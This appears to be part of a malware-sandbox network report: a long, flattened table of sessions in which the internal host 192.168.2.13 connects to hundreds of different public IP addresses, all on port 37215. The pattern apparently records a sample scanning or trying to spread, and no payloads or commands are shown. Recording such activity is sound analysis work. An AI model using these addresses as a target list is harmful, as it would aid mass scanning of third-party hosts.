                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17038192.168.2.1346354156.89.62.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17039192.168.2.1339886197.144.3.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17040192.168.2.1335844157.32.103.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17041192.168.2.133660841.250.12.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17042192.168.2.1360036110.157.132.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17043192.168.2.1351432197.48.15.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17044192.168.2.1359228157.10.133.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17045192.168.2.134832483.139.224.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17046192.168.2.1351888179.130.248.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17047192.168.2.1351736197.235.198.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17048192.168.2.1338664197.210.59.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17049192.168.2.1343838157.137.218.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17050192.168.2.1359804197.0.5.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17051192.168.2.1353190157.145.149.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17052192.168.2.1345802197.119.162.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17053192.168.2.1338468197.219.224.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17054192.168.2.1355938197.3.192.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17055192.168.2.1351010157.137.211.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17056192.168.2.1345452197.208.89.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17057192.168.2.133687641.161.172.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17058192.168.2.1345886197.115.101.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17059192.168.2.135402041.197.200.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17060192.168.2.134065041.129.87.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17061192.168.2.1335330157.216.134.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17062192.168.2.1360590157.84.4.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17063192.168.2.135005641.29.235.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17064192.168.2.133844041.11.103.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17065192.168.2.1357720157.70.17.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17066192.168.2.1344794112.212.133.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17067192.168.2.1342800157.56.208.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17068192.168.2.1341894197.175.178.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17069192.168.2.134813241.108.253.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17070192.168.2.133776641.89.108.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17071192.168.2.1344026197.216.0.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17072192.168.2.134421241.1.46.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17073192.168.2.1337372157.9.125.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17074192.168.2.135562041.156.89.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17075192.168.2.135573641.62.164.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17076192.168.2.1337804157.17.164.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17077192.168.2.1334516157.103.246.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17078192.168.2.1339666157.73.100.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17079192.168.2.133406258.226.189.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17080192.168.2.133310641.97.22.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17081192.168.2.1354852157.250.43.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17082192.168.2.1348772157.121.86.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17083192.168.2.135995841.166.18.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17084192.168.2.1351272206.214.236.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17085192.168.2.134938041.26.215.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17086192.168.2.135531041.180.118.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17087192.168.2.134165841.0.212.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17088192.168.2.1356714157.28.201.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17089192.168.2.1343530197.195.162.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17090192.168.2.1336570157.151.80.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17091192.168.2.134704641.83.233.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17092192.168.2.1339432157.92.126.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17093192.168.2.134985441.19.176.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17094192.168.2.1349976157.253.33.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17095192.168.2.135355041.111.23.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17096192.168.2.134897441.13.198.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17097192.168.2.1340010177.141.142.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17098192.168.2.1349520198.217.170.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17099192.168.2.1338846157.119.7.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17100192.168.2.135037041.151.145.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17101192.168.2.133395241.168.135.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17102192.168.2.1337230197.3.198.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17103192.168.2.134662841.208.44.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17104192.168.2.135385241.233.72.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17105192.168.2.1356204197.177.46.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17106192.168.2.1356198197.67.144.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17107192.168.2.1351642154.147.254.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17108192.168.2.133980241.72.220.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17109192.168.2.134224079.38.203.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17110192.168.2.1356402197.81.4.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17111192.168.2.1337030157.186.78.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17112192.168.2.1343022157.195.19.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17113192.168.2.1359620197.151.222.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17114192.168.2.134542236.230.80.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17115192.168.2.1337314157.6.67.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17116192.168.2.1351154197.28.31.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17117192.168.2.1342486197.105.158.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17118192.168.2.1349968197.202.209.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17119192.168.2.133602441.199.92.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17120192.168.2.1354370157.48.27.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17121192.168.2.135180241.51.80.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17122192.168.2.1354450157.68.46.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17123192.168.2.1344230157.232.247.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17124192.168.2.1336980157.220.14.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17125192.168.2.1341152157.171.204.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17126192.168.2.1336004154.187.77.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17127192.168.2.1333454149.195.251.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17128192.168.2.1353500157.206.36.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17129192.168.2.1355448157.16.245.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17130192.168.2.1359700157.242.40.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17131192.168.2.134530041.240.206.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17132192.168.2.1342472111.32.125.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17133192.168.2.1355320197.217.14.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17134192.168.2.1334396164.87.238.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17135192.168.2.134393241.12.65.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17136192.168.2.1343770157.220.103.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17137192.168.2.1333082157.36.195.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17138192.168.2.1343034197.83.5.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17139192.168.2.134029441.73.2.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17140192.168.2.134445041.32.40.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17141192.168.2.1341422157.181.13.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17142192.168.2.1348446197.98.145.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17143192.168.2.1353914157.11.29.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17144192.168.2.1336456174.59.96.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17145192.168.2.135729841.6.118.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17146192.168.2.135448041.192.23.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17147192.168.2.134362841.81.212.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17148192.168.2.1341760157.63.31.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17149192.168.2.1350900157.216.191.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17150192.168.2.135567641.81.238.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17151192.168.2.1341914157.59.61.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17152192.168.2.1359596198.62.223.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17153192.168.2.1353154197.191.217.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17154192.168.2.135968841.82.119.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17155192.168.2.1334120222.142.159.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17156192.168.2.1342266197.149.56.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17157192.168.2.1359280197.202.52.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17158192.168.2.1334962157.139.1.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17159192.168.2.134405841.210.176.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17160192.168.2.1360498157.245.177.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17161192.168.2.1337888197.251.172.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17162192.168.2.1333906197.78.50.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17163192.168.2.1343582157.132.27.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17164192.168.2.1348236197.195.96.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17165192.168.2.1335816157.220.43.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17166192.168.2.1340144157.202.72.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17167192.168.2.1348472157.137.34.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17168192.168.2.1350980157.165.204.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17169192.168.2.1358400197.122.120.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17170192.168.2.135978041.145.134.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17171192.168.2.133913641.205.21.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17172192.168.2.1342012157.8.87.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17173192.168.2.1341336197.30.237.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17174192.168.2.134855239.206.181.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17175192.168.2.135795281.139.27.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17176192.168.2.1344806157.245.129.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17177192.168.2.133651241.66.138.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17178192.168.2.136098441.181.98.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17179192.168.2.1355076157.237.237.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17180192.168.2.135287441.37.171.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17181192.168.2.1353444197.30.47.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17182192.168.2.1341478133.11.24.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17183192.168.2.135983241.175.20.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17184192.168.2.133802041.225.36.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17185192.168.2.1350760197.203.105.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17186192.168.2.1357980197.184.153.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17187192.168.2.135803641.157.49.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17188192.168.2.135770441.71.39.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17189192.168.2.1355096197.233.191.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17190192.168.2.1344100157.206.38.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17191192.168.2.1355884162.28.220.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192192.168.2.1348200197.2.133.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17193192.168.2.1339684157.16.191.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17194192.168.2.135618088.45.144.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17195192.168.2.1358198158.170.160.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17196192.168.2.1358700197.117.35.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17197192.168.2.1338432222.114.104.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17198192.168.2.13521102.16.140.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17199192.168.2.133476841.69.104.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17200192.168.2.1340734197.59.48.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17201192.168.2.1347532197.226.63.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17202192.168.2.134521841.135.93.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17203192.168.2.1357252197.87.63.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17204192.168.2.135862041.114.4.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17205192.168.2.1356210197.177.41.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17206192.168.2.135568091.27.215.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17207192.168.2.1333414197.25.66.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17208192.168.2.135526213.230.83.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17209192.168.2.134023460.158.61.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17210192.168.2.133676290.12.251.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17211192.168.2.1342624157.32.172.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17212192.168.2.1354254115.133.162.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17213192.168.2.1351312201.64.61.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17214192.168.2.1334104157.157.136.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17215192.168.2.135138241.221.187.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17216192.168.2.1333312157.161.83.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17217192.168.2.1339042197.161.255.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17218192.168.2.134759241.122.98.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17219192.168.2.133442641.3.28.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17220192.168.2.1349992197.83.112.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17221192.168.2.1337404197.63.165.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17222192.168.2.1348996197.77.142.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17223192.168.2.1360134197.240.149.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17224192.168.2.1359470197.184.127.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17225192.168.2.1338782157.194.245.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17226192.168.2.133694241.202.126.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17227192.168.2.134257641.253.92.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17228192.168.2.1340198157.180.31.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17229192.168.2.1347870197.25.122.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17230192.168.2.1350210157.18.103.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17231192.168.2.135627241.57.79.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17232192.168.2.135874841.96.60.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17233192.168.2.1332798197.130.129.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17234192.168.2.1346434157.207.103.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17235192.168.2.1349944197.92.97.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17236192.168.2.1340532157.163.200.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17237192.168.2.134415895.8.55.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17238192.168.2.1358188197.213.107.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17239192.168.2.133543241.93.111.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17240192.168.2.1334372157.46.149.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17241192.168.2.1336382197.169.159.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17242192.168.2.1355424187.253.64.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17243192.168.2.1338862145.134.71.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17244192.168.2.1347886157.248.49.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17245192.168.2.1359948157.155.43.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17246192.168.2.1345554197.224.111.1237215
                                                  TimestampBytes transferredDirectionData


